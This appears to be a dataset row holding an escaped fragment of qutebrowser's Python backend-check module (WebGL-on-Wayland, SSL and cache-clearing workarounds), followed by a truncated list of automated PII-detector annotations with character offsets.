    This allows you to use the newer QtWebEngine backend ""\n ""(based on Chromium). "")\n\n return text, buttons\n\n def _handle_wayland_webgl(self) -> None:\n """"""On older graphic hardware, WebGL on Wayland causes segfaults.\n\n See https://github.com/qutebrowser/qutebrowser/issues/5313\n """"""\n self._assert_backend(usertypes.Backend.QtWebEngine)\n\n if os.environ.get(\'QUTE_SKIP_WAYLAND_WEBGL_CHECK\'):\n return\n\n platform = objects.qapp.platformName()\n if platform not in [\'wayland\', \'wayland-egl\']:\n return\n\n # Only Qt 5.14 should be affected\n if not qtutils.version_check(\'5.14\', compiled=False):\n return\n if qtutils.version_check(\'5.15\', compiled=False):\n return\n\n # Newer graphic hardware isn\'t affected\n opengl_info = version.opengl_info()\n if (opengl_info is None or\n opengl_info.gles or\n opengl_info.version is None or\n opengl_info.version >= (4, 3)):\n return\n\n # If WebGL is turned off, we\'re fine\n if not config.val.content.webgl:\n return\n\n text, buttons = self._xwayland_options()\n\n buttons.append(_Button(""Turn off WebGL (recommended)"",\n \'content.webgl\',\n False))\n text += (""
Disable WebGL (recommended): ""\n ""This sets the content.webgl = False option ""\n ""(if you have a config.py file, you\'ll need to ""\n ""set this manually).
    "")\n\n self._show_dialog(backend=usertypes.Backend.QtWebEngine,\n because=(""of frequent crashes with Qt 5.14 on ""\n ""Wayland with older graphics hardware""),\n text=text,\n buttons=buttons)\n\n def _try_import_backends(self) -> _BackendImports:\n """"""Check whether backends can be imported and return BackendImports.""""""\n # pylint: disable=unused-import\n results = _BackendImports()\n\n try:\n from PyQt5 import QtWebKit\n from PyQt5.QtWebKit import qWebKitVersion\n from PyQt5 import QtWebKitWidgets\n except (ImportError, ValueError) as e:\n results.webkit_error = str(e)\n else:\n if not qtutils.is_new_qtwebkit():\n results.webkit_error = ""Unsupported legacy QtWebKit found""\n\n try:\n from PyQt5 import QtWebEngineWidgets\n except (ImportError, ValueError) as e:\n results.webengine_error = str(e)\n\n return results\n\n def _handle_ssl_support(self, fatal: bool = False) -> None:\n """"""Check for full SSL availability.\n\n If ""fatal"" is given, show an error and exit.\n """"""\n if QSslSocket.supportsSsl():\n return\n\n if qtutils.version_check(\'5.12.4\'):\n version_text = (""If you use OpenSSL 1.0 with a PyQt package from ""\n ""PyPI (e.g. on Ubuntu 16.04), you will need to ""\n ""build OpenSSL 1.1 from sources and set ""\n ""LD_LIBRARY_PATH accordingly."")\n else:\n version_text = (""If you use OpenSSL 1.1 with a PyQt package from ""\n ""PyPI (e.g. on Archlinux or Debian Stretch), you ""\n ""need to set LD_LIBRARY_PATH to the path of ""\n ""OpenSSL 1.0 or use Qt >= 5.12.4."")\n\n text = (""Could not initialize QtNetwork SSL support. {} This only ""\n ""affects downloads and :adblock-update."".format(version_text))\n\n if fatal:\n errbox = msgbox.msgbox(parent=None,\n title=""SSL error"",\n text=""Could not initialize SSL support."",\n icon=QMessageBox.Critical,\n plain_text=False)\n errbox.exec()\n sys.exit(usertypes.Exit.err_init)\n\n assert not fatal\n log.init.warning(text)\n\n def _check_backend_modules(self) -> None:\n """"""Check for the modules needed for QtWebKit/QtWebEngine.""""""\n imports = self._try_import_backends()\n\n if not imports.webkit_error and not imports.webengine_error:\n return\n elif imports.webkit_error and imports.webengine_error:\n text = (""
qutebrowser needs QtWebKit or QtWebEngine, but ""\n ""neither could be imported! ""\n ""The errors encountered were: ""\n ""• QtWebKit: {webkit_error} ""\n ""• QtWebEngine: {webengine_error}
    "".format(\n webkit_error=html.escape(imports.webkit_error),\n webengine_error=html.escape(imports.webengine_error)))\n errbox = msgbox.msgbox(parent=None,\n title=""No backend library found!"",\n text=text,\n icon=QMessageBox.Critical,\n plain_text=False)\n errbox.exec()\n sys.exit(usertypes.Exit.err_init)\n elif objects.backend == usertypes.Backend.QtWebKit:\n if not imports.webkit_error:\n return\n self._show_dialog(\n backend=usertypes.Backend.QtWebKit,\n because=""QtWebKit could not be imported"",\n text=""
The error encountered was: {}
    "".format(\n html.escape(imports.webkit_error))\n )\n elif objects.backend == usertypes.Backend.QtWebEngine:\n if not imports.webengine_error:\n return\n self._show_dialog(\n backend=usertypes.Backend.QtWebEngine,\n because=""QtWebEngine could not be imported"",\n text=""
The error encountered was: {}
    "".format(\n html.escape(imports.webengine_error))\n )\n\n raise utils.Unreachable\n\n def _handle_cache_nuking(self) -> None:\n """"""Nuke the QtWebEngine cache if the Qt version changed.\n\n WORKAROUND for https://bugreports.qt.io/browse/QTBUG-72532\n """"""\n if not configfiles.state.qt_version_changed:\n return\n\n # Only nuke the cache in cases where we know there are problems.\n # It seems these issues started with Qt 5.12.\n # They should be fixed with Qt 5.12.5:\n # https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408\n if qtutils.version_check(\'5.12.5\', compiled=False):\n return\n\n log.init.info(""Qt version changed, nuking QtWebEngine cache"")\n cache_dir = os.path.join(standarddir.cache(), \'webengine\')\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n\n def _handle_serviceworker_nuking(self) -> None:\n """"""Nuke the service workers directory if the Qt version changed.\n\n WORKAROUND for:\n https://bugreports.qt.io/browse/QTBUG-72532\n https://bugreports.qt.io/browse/QTBUG-82105\n """"""\n if (\'serviceworker_workaround\' not in configfiles.state[\'general\'] and\n qtutils.version_check(\'5.14\', compiled=False)):\n # Nuke the service worker directory once for every install with Qt\n # 5.14, given that it seems to cause a variety of segfaults.\n configfiles.state[\'general\'][\'serviceworker_workaround\'] = \'514\'\n affected = True\n else:\n # Otherwise, just nuke it when the Qt version changed.\n affected = configfiles.state.qt_version_changed\n\n if not affected:\n return\n\n service_worker_dir = os.path.join(standarddir.data(), \'webengine\',\n \'Service Worker\')\n bak_dir = service_worker_dir + \'-bak\'\n if not os.path.exists(service_worker_dir):\n return\n\n log.init.info(""Qt version changed, removing service workers"")\n\n # Keep one backup around - we\'re not 100% sure what persistent data\n # could be in there, but this folder can grow to ~300 MB.\n if os.path.exists(bak_dir):\n shutil.rmtree(bak_dir)\n\n shutil.move(service_worker_dir, bak_dir)\n\n def _assert_backend(self, backend: usertypes.Backend) -> None:\n assert objects.backend == backend, objects.backend\n\n def check(self) -> None:\n """"""Run all checks.""""""\n self._check_backend_modules()\n if objects.backend == usertypes.Backend.QtWebEngine:\n self._handle_ssl_support()\n self._nvidia_shader_workaround()\n self._handle_wayland_webgl()\n self._handle_cache_nuking()\n self._handle_serviceworker_nuking()\n else:\n self._assert_backend(usertypes.Backend.QtWebKit)\n self._handle_ssl_support(fatal=True)\n\n\ndef init(*, args: argparse.Namespace,\n save_manager: savemanager.SaveManager) -> None:\n """"""Run all checks.""""""\n checker = _BackendProblemChecker(no_err_windows=args.no_err_windows,\n save_manager=save_manager)\n checker.check()\n']",110,"[type: DATE_TIME, start: 5, end: 15, score: 0.85, type: DATE_TIME, start: 110, end: 120, score: 0.85, type: PERSON, start: 302, end: 346, score: 0.85, type: PERSON, start: 487, end: 494, score: 0.85, type: PERSON, start: 1048, end: 1054, score: 0.85, type: URL, start: 70, end: 85, score: 0.6, type: URL, start: 315, end: 358, score: 0.6, type: LOCATION, start: 174, end: 183, score: 0.85, type: LOCATION, start: 270, end: 274, score: 0.85, type: LOCATION, start: 410, end: 420, score: 0.85, type: PERSON, start: 619, end: 628, score: 0.85, type: PERSON, start: 1008, end: 1017, score: 0.85, type: IP_ADDRESS, start: 219, end: 228, score: 0.6, type: URL, start: 9, end: 20, score: 0.5, type: URL, start: 66, end: 79, score: 0.5, type: 
URL, start: 96, end: 109, score: 0.5, type: URL, start: 320, end: 326, score: 0.5, type: URL, start: 342, end: 348, score: 0.5, type: URL, start: 360, end: 366, score: 0.5, type: URL, start: 454, end: 467, score: 0.5, type: URL, start: 500, end: 506, score: 0.5, type: URL, start: 670, end: 683, score: 0.5, type: URL, start: 762, end: 769, score: 0.5, type: URL, start: 883, end: 896, score: 0.5, type: URL, start: 1038, end: 1051, score: 0.5, type: URL, start: 1157, end: 1162, score: 0.5, type: URL, start: 1294, end: 1311, score: 0.5, type: URL, start: 1333, end: 1339, score: 0.5, type: URL, start: 1399, end: 1412, score: 0.5, type: PERSON, start: 120, end: 125, score: 0.85, type: DATE_TIME, start: 747, end: 771, score: 0.85, type: DATE_TIME, start: 842, end: 866, score: 0.85, type: PERSON, start: 1965, end: 1968, score: 0.85, type: IP_ADDRESS, start: 313, end: 316, score: 0.6, type: URL, start: 108, end: 119, score: 0.5, type: URL, start: 1341, end: 1346, score: 0.5, type: URL, start: 1357, end: 1367, score: 0.5, type: URL, start: 1400, end: 1410, score: 0.5, type: URL, start: 1630, end: 1636, score: 0.5, type: URL, start: 1749, end: 1755, score: 0.5, type: URL, start: 2004, end: 2017, score: 0.5, type: URL, start: 2110, end: 2116, score: 0.5, type: URL, start: 2420, end: 2431, score: 0.5, type: URL, start: 2479, end: 2490, score: 0.5, type: EMAIL_ADDRESS, start: 62, end: 77, score: 1.0, type: DATE_TIME, start: 41, end: 45, score: 0.85, type: PERSON, start: 46, end: 61, score: 0.85, type: PERSON, start: 4030, end: 4052, score: 0.85, type: PERSON, start: 6134, end: 6148, score: 0.85, type: PERSON, start: 6438, end: 6452, score: 0.85, type: PERSON, start: 8139, end: 8144, score: 0.85, type: PERSON, start: 8432, end: 8447, score: 0.85, type: URL, start: 9829, end: 9839, score: 0.85, type: URL, start: 9867, end: 9877, score: 0.85, type: NRP, start: 14363, end: 14372, score: 0.85, type: LOCATION, start: 14478, end: 14485, score: 0.85, type: LOCATION, start: 14611, end: 14639, score: 0.85, type: URL, start: 703, end: 731, score: 0.6, type: URL, start: 6154, end: 6188, score: 0.6, type: URL, start: 8148, end: 8190, score: 0.6, type: URL, start: 8449, end: 8469, score: 0.6, type: URL, start: 11433, end: 11453, score: 0.6, type: URL, start: 68, end: 77, score: 0.5, type: URL, start: 1112, end: 1129, score: 0.5, type: URL, start: 1545, end: 1557, score: 0.5, type: URL, start: 1903, end: 1910, score: 0.5, type: URL, start: 2014, end: 2023, score: 0.5, type: URL, start: 2291, end: 2296, score: 0.5, type: URL, start: 2420, end: 2433, score: 0.5, type: URL, start: 2483, end: 2488, score: 0.5, type: URL, start: 2520, end: 2533, score: 0.5, type: URL, start: 2583, end: 2593, score: 0.5, type: URL, start: 2732, end: 2742, score: 0.5, type: URL, start: 2785, end: 2798, score: 0.5, type: URL, start: 2862, end: 2867, score: 0.5, type: URL, start: 3065, end: 3076, score: 0.5, type: URL, start: 3176, end: 3187, score: 0.5, type: URL, start: 4361, end: 4374, score: 0.5, type: URL, start: 4428, end: 4441, score: 0.5, type: URL, start: 4475, end: 4488, score: 0.5, type: URL, start: 4515, end: 4520, score: 0.5, type: URL, start: 5255, end: 5262, score: 0.5, type: URL, start: 5788, end: 5794, score: 0.5, type: URL, start: 6703, end: 6715, score: 0.5, type: URL, start: 6817, end: 6824, score: 0.5, type: URL, start: 6932, end: 6939, score: 0.5, type: URL, start: 7105, end: 7112, score: 0.5, type: URL, start: 8353, end: 8363, score: 0.5, type: URL, start: 8552, end: 8559, score: 0.5, type: URL, start: 8579, end: 8586, 
score: 0.5, type: URL, start: 8607, end: 8614, score: 0.5, type: URL, start: 8639, end: 8646, score: 0.5, type: URL, start: 8669, end: 8677, score: 0.5, type: URL, start: 8695, end: 8703, score: 0.5, type: URL, start: 8738, end: 8746, score: 0.5, type: URL, start: 9047, end: 9054, score: 0.5, type: URL, start: 9183, end: 9190, score: 0.5, type: URL, start: 9222, end: 9229, score: 0.5, type: URL, start: 9251, end: 9258, score: 0.5, type: URL, start: 9312, end: 9319, score: 0.5, type: URL, start: 9330, end: 9337, score: 0.5, type: URL, start: 9407, end: 9415, score: 0.5, type: URL, start: 9436, end: 9443, score: 0.5, type: URL, start: 9752, end: 9767, score: 0.5, type: URL, start: 10065, end: 10072, score: 0.5, type: URL, start: 11175, end: 11182, score: 0.5, type: URL, start: 11418, end: 11429, score: 0.5, type: URL, start: 11526, end: 11542, score: 0.5, type: URL, start: 12023, end: 12051, score: 0.5, type: URL, start: 12438, end: 12445, score: 0.5, type: URL, start: 12714, end: 12721, score: 0.5, type: URL, start: 12763, end: 12771, score: 0.5, type: URL, start: 13606, end: 13614, score: 0.5, type: URL, start: 14045, end: 14055, score: 0.5, type: URL, start: 14301, end: 14307, score: 0.5, type: URL, start: 14495, end: 14501, score: 0.5, type: URL, start: 14619, end: 14625, score: 0.5, type: URL, start: 14722, end: 14741, score: 0.5, type: EMAIL_ADDRESS, start: 7886, end: 7901, score: 1.0, type: EMAIL_ADDRESS, start: 7925, end: 7940, score: 1.0, type: EMAIL_ADDRESS, start: 7966, end: 7981, score: 1.0, type: URL, start: 15787, end: 15844, score: 0.95, type: DATE_TIME, start: 30, end: 34, score: 0.85, type: PERSON, start: 1008, end: 1019, score: 0.85, type: PERSON, start: 3042, end: 3091, score: 0.85, type: PERSON, start: 5667, end: 5704, score: 0.85, type: PERSON, start: 6350, end: 6366, score: 0.85, type: PERSON, start: 6557, end: 6568, score: 0.85, type: PERSON, start: 7003, end: 7007, score: 0.85, type: PERSON, start: 7800, end: 7809, score: 0.85, type: PERSON, start: 8423, end: 8439, score: 0.85, type: PERSON, start: 8844, end: 8892, score: 0.85, type: DATE_TIME, start: 9386, end: 9393, score: 0.85, type: PERSON, start: 9681, end: 9718, score: 0.85, type: PERSON, start: 9748, end: 9794, score: 0.85, type: PERSON, start: 10504, end: 10527, score: 0.85, type: PERSON, start: 11480, end: 11508, score: 0.85, type: DATE_TIME, start: 11845, end: 11847, score: 0.85, type: DATE_TIME, start: 11849, end: 11851, score: 0.85, type: DATE_TIME, start: 11856, end: 11858, score: 0.85, type: LOCATION, start: 12025, end: 12039, score: 0.85, type: DATE_TIME, start: 12753, end: 12771, score: 0.85, type: URL, start: 13048, end: 13058, score: 0.85, type: LOCATION, start: 13447, end: 13477, score: 0.85, type: PERSON, start: 13643, end: 13662, score: 0.85, type: PERSON, start: 13819, end: 13827, score: 0.85, type: PERSON, start: 17078, end: 17095, score: 0.85, type: NRP, start: 17209, end: 17240, score: 0.85, type: PERSON, start: 18628, end: 18649, score: 0.85, type: PERSON, start: 18825, end: 18844, score: 0.85, type: LOCATION, start: 19005, end: 19021, score: 0.85, type: PERSON, start: 19269, end: 19303, score: 0.85, type: PERSON, start: 19390, end: 19426, score: 0.85, type: PERSON, start: 19633, end: 19667, score: 0.85, type: PERSON, start: 21128, end: 21154, score: 0.85, type: DATE_TIME, start: 21301, end: 21309, score: 0.85, type: PERSON, start: 21403, end: 21412, score: 0.85, type: DATE_TIME, start: 22138, end: 22145, score: 0.85, type: DATE_TIME, start: 22484, end: 22491, score: 0.85, type: PERSON, 
start: 25141, end: 25152, score: 0.85, type: NRP, start: 25154, end: 25163, score: 0.85, type: NRP, start: 25270, end: 25277, score: 0.85, type: NRP, start: 25331, end: 25339, score: 0.85, type: NRP, start: 25392, end: 25397, score: 0.85, type: NRP, start: 25448, end: 25454, score: 0.85, type: NRP, start: 25510, end: 25515, score: 0.85, type: PERSON, start: 25557, end: 25567, score: 0.85, type: NRP, start: 25628, end: 25635, score: 0.85, type: NRP, start: 25689, end: 25695, score: 0.85, type: NRP, start: 25748, end: 25754, score: 0.85, type: NRP, start: 25808, end: 25813, score: 0.85, type: PERSON, start: 25969, end: 25977, score: 0.85, type: NRP, start: 25979, end: 25988, score: 0.85, type: LOCATION, start: 26039, end: 26048, score: 0.85, type: NRP, start: 26050, end: 26060, score: 0.85, type: NRP, start: 26114, end: 26121, score: 0.85, type: NRP, start: 26170, end: 26178, score: 0.85, type: PERSON, start: 26200, end: 26202, score: 0.85, type: NRP, start: 26227, end: 26233, score: 0.85, type: NRP, start: 26287, end: 26294, score: 0.85, type: NRP, start: 26348, end: 26358, score: 0.85, type: NRP, start: 26409, end: 26418, score: 0.85, type: NRP, start: 26469, end: 26476, score: 0.85, type: NRP, start: 26528, end: 26534, score: 0.85, type: NRP, start: 26589, end: 26599, score: 0.85, type: PERSON, start: 26641, end: 26649, score: 0.85, type: NRP, start: 26651, end: 26659, score: 0.85, type: NRP, start: 26712, end: 26719, score: 0.85, type: NRP, start: 26771, end: 26778, score: 0.85, type: PERSON, start: 26820, end: 26832, score: 0.85, type: NRP, start: 26834, end: 26840, score: 0.85, type: NRP, start: 26897, end: 26906, score: 0.85, type: NRP, start: 26959, end: 26966, score: 0.85, type: DATE_TIME, start: 27008, end: 27017, score: 0.85, type: NRP, start: 27019, end: 27026, score: 0.85, type: NRP, start: 27079, end: 27083, score: 0.85, type: NRP, start: 27135, end: 27142, score: 0.85, type: NRP, start: 27198, end: 27207, score: 0.85, type: NRP, start: 27263, end: 27273, score: 0.85, type: LOCATION, start: 27556, end: 27565, score: 0.85, type: PERSON, start: 27789, end: 27794, score: 0.85, type: PERSON, start: 29881, end: 29903, score: 0.85, type: PERSON, start: 30294, end: 30317, score: 0.85, type: URL, start: 261, end: 303, score: 0.6, type: URL, start: 1022, end: 1035, score: 0.5, type: URL, start: 1601, end: 1614, score: 0.5, type: URL, start: 1794, end: 1804, score: 0.5, type: URL, start: 1858, end: 1868, score: 0.5, type: URL, start: 1920, end: 1930, score: 0.5, type: URL, start: 1975, end: 1985, score: 0.5, type: URL, start: 2032, end: 2042, score: 0.5, type: URL, start: 2091, end: 2101, score: 0.5, type: URL, start: 2166, end: 2176, score: 0.5, type: URL, start: 2402, end: 2412, score: 0.5, type: URL, start: 2500, end: 2510, score: 0.5, type: URL, start: 2566, end: 2576, score: 0.5, type: URL, start: 2647, end: 2657, score: 0.5, type: URL, start: 2750, end: 2760, score: 0.5, type: URL, start: 2768, end: 2773, score: 0.5, type: URL, start: 6938, end: 6949, score: 0.5, type: URL, start: 7156, end: 7163, score: 0.5, type: URL, start: 7757, end: 7768, score: 0.5, type: URL, start: 7892, end: 7901, score: 0.5, type: URL, start: 7931, end: 7940, score: 0.5, type: URL, start: 7972, end: 7981, score: 0.5, type: URL, start: 8429, end: 8439, score: 0.5, type: URL, start: 12885, end: 12895, score: 0.5, type: URL, start: 12970, end: 12980, score: 0.5, type: URL, start: 13125, end: 13135, score: 0.5, type: URL, start: 13202, end: 13212, score: 0.5, type: URL, start: 13280, end: 13290, score: 0.5, 
type: URL, start: 14207, end: 14217, score: 0.5, type: URL, start: 23124, end: 23133, score: 0.5, type: URL, start: 24550, end: 24558, score: 0.5, type: URL, start: 30390, end: 30399, score: 0.5, type: EMAIL_ADDRESS, start: 1343, end: 1358, score: 1.0, type: DATE_TIME, start: 127, end: 131, score: 0.85, type: PERSON, start: 132, end: 148, score: 0.85, type: LOCATION, start: 1071, end: 1078, score: 0.85, type: PERSON, start: 1099, end: 1106, score: 0.85, type: DATE_TIME, start: 1283, end: 1293, score: 0.85, type: DATE_TIME, start: 1307, end: 1311, score: 0.85, type: PERSON, start: 1329, end: 1341, score: 0.85, type: DATE_TIME, start: 1361, end: 1365, score: 0.85, type: PERSON, start: 1785, end: 1805, score: 0.85, type: PERSON, start: 2538, end: 2548, score: 0.85, type: DATE_TIME, start: 2577, end: 2587, score: 0.85, type: LOCATION, start: 3334, end: 3343, score: 0.85, type: PERSON, start: 3715, end: 3726, score: 0.85, type: PERSON, start: 3731, end: 3751, score: 0.85, type: LOCATION, start: 5164, end: 5177, score: 0.85, type: PERSON, start: 6499, end: 6503, score: 0.85, type: PERSON, start: 7137, end: 7139, score: 0.85, type: PERSON, start: 7163, end: 7165, score: 0.85, type: PERSON, start: 7219, end: 7223, score: 0.85, type: PERSON, start: 7589, end: 7609, score: 0.85, type: PERSON, start: 7682, end: 7697, score: 0.85, type: DATE_TIME, start: 7727, end: 7735, score: 0.85, type: LOCATION, start: 8276, end: 8280, score: 0.85, type: LOCATION, start: 8630, end: 8636, score: 0.85, type: PERSON, start: 8638, end: 8643, score: 0.85, type: PERSON, start: 8970, end: 8985, score: 0.85, type: NRP, start: 9009, end: 9017, score: 0.85, type: DATE_TIME, start: 9090, end: 9094, score: 0.85, type: PERSON, start: 9111, end: 9126, score: 0.85, type: DATE_TIME, start: 9228, end: 9232, score: 0.85, type: LOCATION, start: 9472, end: 9485, score: 0.85, type: DATE_TIME, start: 9516, end: 9521, score: 0.85, type: LOCATION, start: 10228, end: 10240, score: 0.85, type: LOCATION, start: 10315, end: 10324, score: 0.85, type: URL, start: 1805, end: 1861, score: 0.6, type: URL, start: 3751, end: 3810, score: 0.6, type: URL, start: 4838, end: 4900, score: 0.6, type: URL, start: 7796, end: 7854, score: 0.6, type: URL, start: 9292, end: 9353, score: 0.6, type: URL, start: 10663, end: 10723, score: 0.6, type: URL, start: 8, end: 20, score: 0.5, type: URL, start: 1349, end: 1358, score: 0.5, type: URL, start: 1880, end: 1888, score: 0.5, type: URL, start: 2004, end: 2009, score: 0.5, type: URL, start: 2618, end: 2626, score: 0.5, type: URL, start: 3017, end: 3022, score: 0.5, type: URL, start: 3065, end: 3070, score: 0.5, type: URL, start: 4006, end: 4011, score: 0.5, type: URL, start: 6522, end: 6527, score: 0.5, type: URL, start: 7271, end: 7276, score: 0.5, type: URL, start: 8339, end: 8344, score: 0.5, type: EMAIL_ADDRESS, start: 456, end: 471, score: 1.0, type: EMAIL_ADDRESS, start: 511, end: 526, score: 1.0, type: PERSON, start: 131, end: 143, score: 0.85, type: PERSON, start: 155, end: 173, score: 0.85, type: PERSON, start: 214, end: 233, score: 0.85, type: PERSON, start: 278, end: 297, score: 0.85, type: DATE_TIME, start: 346, end: 355, score: 0.85, type: PERSON, start: 356, end: 368, score: 0.85, type: PERSON, start: 370, end: 388, score: 0.85, type: DATE_TIME, start: 431, end: 435, score: 0.85, type: PERSON, start: 436, end: 455, score: 0.85, type: PERSON, start: 491, end: 510, score: 0.85, type: PERSON, start: 1413, end: 1434, score: 0.85, type: PERSON, start: 1435, end: 1460, score: 0.85, type: URL, start: 1194, 
end: 1222, score: 0.6, type: URL, start: 462, end: 471, score: 0.5, type: URL, start: 517, end: 526, score: 0.5, type: URL, start: 1233, end: 1255, score: 0.5, type: URL, start: 1340, end: 1347, score: 0.5, type: URL, start: 1370, end: 1376, score: 0.5, type: URL, start: 1431, end: 1437, score: 0.5, type: URL, start: 1826, end: 1832, score: 0.5, type: EMAIL_ADDRESS, start: 105, end: 120, score: 1.0, type: EMAIL_ADDRESS, start: 164, end: 179, score: 1.0, type: EMAIL_ADDRESS, start: 221, end: 236, score: 1.0, type: EMAIL_ADDRESS, start: 689, end: 704, score: 1.0, type: EMAIL_ADDRESS, start: 732, end: 747, score: 1.0, type: EMAIL_ADDRESS, start: 773, end: 788, score: 1.0, type: DATE_TIME, start: 42, end: 51, score: 0.85, type: DATE_TIME, start: 86, end: 90, score: 0.85, type: PERSON, start: 91, end: 104, score: 0.85, type: DATE_TIME, start: 137, end: 146, score: 0.85, type: PERSON, start: 147, end: 163, score: 0.85, type: DATE_TIME, start: 196, end: 205, score: 0.85, type: NRP, start: 206, end: 215, score: 0.85, type: PERSON, start: 675, end: 688, score: 0.85, type: PERSON, start: 715, end: 731, score: 0.85, type: PERSON, start: 2405, end: 2411, score: 0.85, type: PERSON, start: 3264, end: 3268, score: 0.85, type: LOCATION, start: 4960, end: 4973, score: 0.85, type: PERSON, start: 6468, end: 6479, score: 0.85, type: PERSON, start: 8948, end: 8956, score: 0.85, type: NRP, start: 8994, end: 9005, score: 0.85, type: PERSON, start: 10794, end: 10800, score: 0.85, type: PERSON, start: 11038, end: 11049, score: 0.85, type: PERSON, start: 12049, end: 12057, score: 0.85, type: PERSON, start: 12539, end: 12542, score: 0.85, type: PERSON, start: 12901, end: 12912, score: 0.85, type: PERSON, start: 12930, end: 12937, score: 0.85, type: PERSON, start: 12962, end: 12973, score: 0.85, type: PERSON, start: 14295, end: 14303, score: 0.85, type: PERSON, start: 15498, end: 15502, score: 0.85, type: LOCATION, start: 20656, end: 20675, score: 0.85, type: LOCATION, start: 20677, end: 20685, score: 0.85, type: PERSON, start: 22184, end: 22189, score: 0.85, type: PERSON, start: 22640, end: 22646, score: 0.85, type: NRP, start: 24825, end: 24840, score: 0.85, type: LOCATION, start: 24963, end: 24971, score: 0.85, type: NRP, start: 25500, end: 25512, score: 0.85, type: NRP, start: 27531, end: 27543, score: 0.85, type: NRP, start: 27652, end: 27664, score: 0.85, type: LOCATION, start: 27897, end: 27919, score: 0.85, type: NRP, start: 28744, end: 28756, score: 0.85, type: LOCATION, start: 28945, end: 28955, score: 0.85, type: PERSON, start: 30087, end: 30121, score: 0.85, type: PERSON, start: 30666, end: 30704, score: 0.85, type: LOCATION, start: 31649, end: 31660, score: 0.85, type: PERSON, start: 34519, end: 34527, score: 0.85, type: PERSON, start: 34754, end: 34762, score: 0.85, type: NRP, start: 36708, end: 36720, score: 0.85, type: URL, start: 36967, end: 36974, score: 0.85, type: PERSON, start: 41135, end: 41141, score: 0.85, type: URL, start: 41811, end: 41822, score: 0.85, type: URL, start: 42418, end: 42424, score: 0.85, type: URL, start: 42895, end: 42907, score: 0.85, type: URL, start: 421, end: 463, score: 0.6, type: URL, start: 632, end: 662, score: 0.6, type: IP_ADDRESS, start: 16651, end: 16659, score: 0.6, type: IP_ADDRESS, start: 20153, end: 20157, score: 0.6, type: URL, start: 111, end: 120, score: 0.5, type: URL, start: 170, end: 179, score: 0.5, type: URL, start: 227, end: 236, score: 0.5, type: URL, start: 695, end: 704, score: 0.5, type: URL, start: 738, end: 747, score: 0.5, type: URL, start: 
779, end: 788, score: 0.5, type: URL, start: 2425, end: 2434, score: 0.5, type: URL, start: 2525, end: 2534, score: 0.5, type: URL, start: 2562, end: 2569, score: 0.5, type: URL, start: 2616, end: 2623, score: 0.5, type: URL, start: 2640, end: 2647, score: 0.5, type: URL, start: 2794, end: 2806, score: 0.5, type: URL, start: 4903, end: 4910, score: 0.5, type: URL, start: 4960, end: 4967, score: 0.5, type: URL, start: 4993, end: 5000, score: 0.5, type: URL, start: 5018, end: 5025, score: 0.5, type: URL, start: 5239, end: 5250, score: 0.5, type: URL, start: 5422, end: 5441, score: 0.5, type: URL, start: 5505, end: 5515, score: 0.5, type: URL, start: 5546, end: 5556, score: 0.5, type: URL, start: 6444, end: 6454, score: 0.5, type: URL, start: 6516, end: 6526, score: 0.5, type: URL, start: 6584, end: 6594, score: 0.5, type: URL, start: 6825, end: 6832, score: 0.5, type: URL, start: 6889, end: 6896, score: 0.5, type: URL, start: 6905, end: 6912, score: 0.5, type: URL, start: 6924, end: 6934, score: 0.5, type: URL, start: 7222, end: 7232, score: 0.5, type: URL, start: 7236, end: 7243, score: 0.5, type: URL, start: 7716, end: 7726, score: 0.5, type: URL, start: 7758, end: 7777, score: 0.5, type: URL, start: 7784, end: 7795, score: 0.5, type: URL, start: 7824, end: 7843, score: 0.5, type: URL, start: 7847, end: 7858, score: 0.5, type: URL, start: 7961, end: 7971, score: 0.5, type: URL, start: 8490, end: 8496, score: 0.5, type: URL, start: 8599, end: 8605, score: 0.5, type: URL, start: 8672, end: 8678, score: 0.5, type: URL, start: 8703, end: 8709, score: 0.5, type: URL, start: 8751, end: 8757, score: 0.5, type: URL, start: 8828, end: 8834, score: 0.5, type: URL, start: 8857, end: 8863, score: 0.5, type: URL, start: 8903, end: 8909, score: 0.5, type: URL, start: 9383, end: 9389, score: 0.5, type: URL, start: 9472, end: 9478, score: 0.5, type: URL, start: 9533, end: 9539, score: 0.5, type: URL, start: 9769, end: 9777, score: 0.5, type: URL, start: 9990, end: 9996, score: 0.5, type: URL, start: 10419, end: 10426, score: 0.5, type: URL, start: 10485, end: 10489, score: 0.5, type: URL, start: 12643, end: 12651, score: 0.5, type: URL, start: 12704, end: 12708, score: 0.5, type: URL, start: 13024, end: 13032, score: 0.5, type: URL, start: 13179, end: 13187, score: 0.5, type: URL, start: 13331, end: 13337, score: 0.5, type: URL, start: 13658, end: 13663, score: 0.5, type: URL, start: 14306, end: 14318, score: 0.5, type: URL, start: 14440, end: 14445, score: 0.5, type: URL, start: 14538, end: 14546, score: 0.5, type: URL, start: 14556, end: 14564, score: 0.5, type: URL, start: 14574, end: 14582, score: 0.5, type: URL, start: 14614, end: 14622, score: 0.5, type: URL, start: 15566, end: 15573, score: 0.5, type: URL, start: 15631, end: 15638, score: 0.5, type: URL, start: 15696, end: 15703, score: 0.5, type: URL, start: 16315, end: 16325, score: 0.5, type: URL, start: 16328, end: 16339, score: 0.5, type: URL, start: 16363, end: 16374, score: 0.5, type: URL, start: 21057, end: 21064, score: 0.5, type: URL, start: 21084, end: 21091, score: 0.5, type: URL, start: 21117, end: 21124, score: 0.5, type: URL, start: 21226, end: 21233, score: 0.5, type: URL, start: 21260, end: 21267, score: 0.5, type: URL, start: 21284, end: 21297, score: 0.5, type: URL, start: 21300, end: 21307, score: 0.5, type: URL, start: 21331, end: 21346, score: 0.5, type: URL, start: 21392, end: 21399, score: 0.5, type: URL, start: 21430, end: 21445, score: 0.5, type: URL, start: 22982, end: 23002, score: 0.5, type: URL, start: 23179, end: 
